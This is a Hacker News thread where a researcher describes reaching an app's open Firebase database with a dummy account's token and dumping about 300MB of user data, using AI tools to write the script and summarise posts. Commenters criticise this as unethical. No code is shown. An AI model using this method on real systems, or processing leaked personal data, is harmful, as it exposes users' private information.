Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Hi all, i'm the security researcher mentioned in the article -- just to be clear:

1. The leak Friday was from firebase's file storage service

2. This one is about their firebase database service also being open (up until Saturday morning)

The tl;dr is:

1. App signed up using Firebase Auth

2. App traded Firebase Auth token to API for API token

3. API talked to Firebase DB

The issue is you could just take the Firebase Auth key, talk to Firebase directly, and they had the read/write/update/delete permissions open to all users so it opened up an IDOR exploit.

I pulled the data Friday night to have evidence to prove the information wasn't old like the previous leak and immediately reached out to 404media.

Here is a gist of Gemini 2.5 Pro summarizing 10k random posts: https://gist.github.com/jc4p/7c8ce9a7392f2cbc227f9c6a4096111...

And to be 100% clear, the data in this second "leak" is a 300MB JSON file that (hopefully) only exists on my computer, but I did see evidence that other people were communicating with the Firebase database directly.

If anyone is interested in the how: I signed up against Firebase Auth using a dummy email and password, retrieved an idToken, sent it into the script generated by this Claude convo: https://claude.ai/share/2c53838d-4d11-466b-8617-eae1a1e84f56

And here's the output of that script (any db that has <100 rows is something another "hacker" wrote to and deleted from): https://gist.github.com/jc4p/bc35138a120715b92a1925f54a9d8bb...



Doesn't that Gemini summary gist tie usernames to pretty specific highly personal non-public stories? That seems like a significant violation of ethical hacking principles.


They're anonymous usernames the app had them make and they were told don't use anything shared elsewhere and I googled and there's not any uniquely identifiable people from any of them.

They seem generic enough that I think it's okay, but you're right there is no need in including them and I should've caught that in the AI output, thank you!!


I think including specific stories is already an ethical hacking violation.

Including the pseudonyms associated with those stories creates unnecessary risk of, and arguably incentive for those individuals.

I also just don't get the mindset of dumping something like this into an AI tool for a summary. You say "a 300MB JSON file that (hopefully) only exists on my computer" but then exposed part of that data to generate an AI summary.

Having the file on your computer is questionable enough but not treating it as something private to be professionally protected is IMHO another ethical violation.


I don't see the need for the AI output to begin with. Normally pen-testers just demonstrate breaches, this is more like exposing what users do on the app.


Are you concerned about potential CFAA issues?


Yes! haha! But hopefully I have a good enough support group and connections that I'll be ok if that happens, I just really wanted to prove that they were not being honest when they said it was data prior to 2024.


Computer Fraud and Abuse Act - "CFAA"




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: